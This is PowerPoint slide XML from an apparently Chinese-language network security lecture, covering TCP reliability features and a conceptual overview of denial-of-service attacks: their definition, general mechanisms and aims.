              </a:cxn>
              <a:cxn ang="T13">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="T14">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T15" t="T16" r="T17" b="T18"/>
            <a:pathLst>
              <a:path w="8280920" h="619447">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8280920" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8280920" y="619447"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="61944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自动分片；保证传送给应用层的数据顺序是正确的 ；自动过滤重复的封包 ；确认</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>重传确保数据包可靠到达 </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5" name="Freeform 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="611188" y="4814888"/>
            <a:ext cx="8281987" cy="608012"/>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64 h 608107"/>
              <a:gd name="T14" fmla="*/ 8261868 w 8280920"/>
              <a:gd name="T15" fmla="*/ 577521 h 608107"/>
              <a:gd name="T16" fmla="*/ 8190091 w 8280920"/>
              <a:gd name="T17" fmla="*/ 607157 h 608107"/>
              <a:gd name="T18" fmla="*/ 101483 w 8280920"/>
              <a:gd name="T19" fmla="*/ 607157 h 608107"/>
              <a:gd name="T20" fmla="*/ 29726 w 8280920"/>
              <a:gd name="T21" fmla="*/ 577521 h 608107"/>
              <a:gd name="T22" fmla="*/ 0 w 8280920"/>
              <a:gd name="T23" fmla="*/ 50596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464B79"/>
          </a:solidFill>
          <a:ln w="55000" cmpd="thickThin">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:bevel/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="109695" tIns="109695" rIns="109695" bIns="109695"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Aft>
                <a:spcPct val="35000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>面向字节流</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(byte-stream)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34826" name="Freeform 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="611188" y="5422900"/>
            <a:ext cx="8281987" cy="347663"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 8280920"/>
              <a:gd name="T1" fmla="*/ 0 h 347760"/>
              <a:gd name="T2" fmla="*/ 8291592 w 8280920"/>
              <a:gd name="T3" fmla="*/ 0 h 347760"/>
              <a:gd name="T4" fmla="*/ 8291592 w 8280920"/>
              <a:gd name="T5" fmla="*/ 346790 h 347760"/>
              <a:gd name="T6" fmla="*/ 0 w 8280920"/>
              <a:gd name="T7" fmla="*/ 346790 h 347760"/>
              <a:gd name="T8" fmla="*/ 0 w 8280920"/>
              <a:gd name="T9" fmla="*/ 0 h 347760"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 60000 65536"/>
              <a:gd name="T13" fmla="*/ 0 60000 65536"/>
              <a:gd name="T14" fmla="*/ 0 60000 65536"/>
              <a:gd name="T15" fmla="*/ 0 w 8280920"/>
              <a:gd name="T16" fmla="*/ 0 h 347760"/>
              <a:gd name="T17" fmla="*/ 8280920 w 8280920"/>
              <a:gd name="T18" fmla="*/ 347760 h 347760"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T10">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T12">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T13">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="T14">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T15" t="T16" r="T17" b="T18"/>
            <a:pathLst>
              <a:path w="8280920" h="347760">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8280920" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8280920" y="347760"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3477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itchFamily="2" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="171450" indent="-1714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议将应用程序和网络传输相分割，为流传输服务提供了一个一致的接口</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="16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p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="34819"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="34819"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3481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4821"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="34821"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="34821"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3482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4823"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="34823"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="34823"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3482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4825"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="34825"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.70"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="34825"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="34825"/>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34820"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="34820"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="34820"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3482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4822"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="34822"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="34822"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="35" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3482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4824"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="38" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="34824"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="34824"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3482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4826"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="34826"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="34826"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="348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ldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="34820" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="34821" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="34822" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="34823" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="34824" grpId="0" bldLvl="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="34825" grpId="0" bldLvl="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="34826" grpId="0" bldLvl="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拒绝服务攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66563" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchorCtr="0" compatLnSpc="1"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{33DFCE93-5EF1-41EA-92FC-E50C40EC102F}"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a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>拒绝服务攻击</a:t>
            </a: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9911" y="3706912"/>
            <a:ext cx="3170378" cy="2314376"/>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4007300"/>
            <a:ext cx="1905060" cy="1941980"/>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闪电形 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1563688" y="2962275"/>
            <a:ext cx="484187"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闪电形 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3125788" y="3022600"/>
            <a:ext cx="485775"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a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2197100" y="2986088"/>
            <a:ext cx="504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3200" b="1"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="闪电形 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="6978828">
            <a:off x="5168901" y="4213225"/>
            <a:ext cx="609600" cy="1228725"/>
          </a:xfrm>
          <a:prstGeom prst="lightningBol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141" y="1421223"/>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318" y="1285655"/>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80" y="1141639"/>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云形标注 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6948488" y="2068513"/>
            <a:ext cx="1544637" cy="1512887"/>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chemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>怎么打不通呢</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>？？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1763689" y="5085184"/>
            <a:ext cx="6192688" cy="9361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rgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>呼死你！！！</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" b="1">
              <a:solidFill>
                <a:srgbClr val="FF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p:bldP spid="16" grpId="0" animBg="1"/>
      <p:bldP spid="15" grpId="0" animBg="1"/>
      <p:bldP spid="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normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>者通过某种手段，导致目标机器或网络停止向合法用户提供</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>正常服务</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>或资源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>访问。 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网络协议漏洞或其他</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>系统及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>应用软件的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>耗尽</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>被攻击的计算机或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>网络的资源，使其无法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>正常提供服务</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，直至</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>系统停止响应甚至</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>崩溃。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：攻击可用性</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>目的：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>破坏组织正常运行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>崩溃</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>使网络功能失效</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>使某个服务器瘫痪，以方便黑客冒充；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>强制服务器重启，以便于黑客启动木马程序。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="288770" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
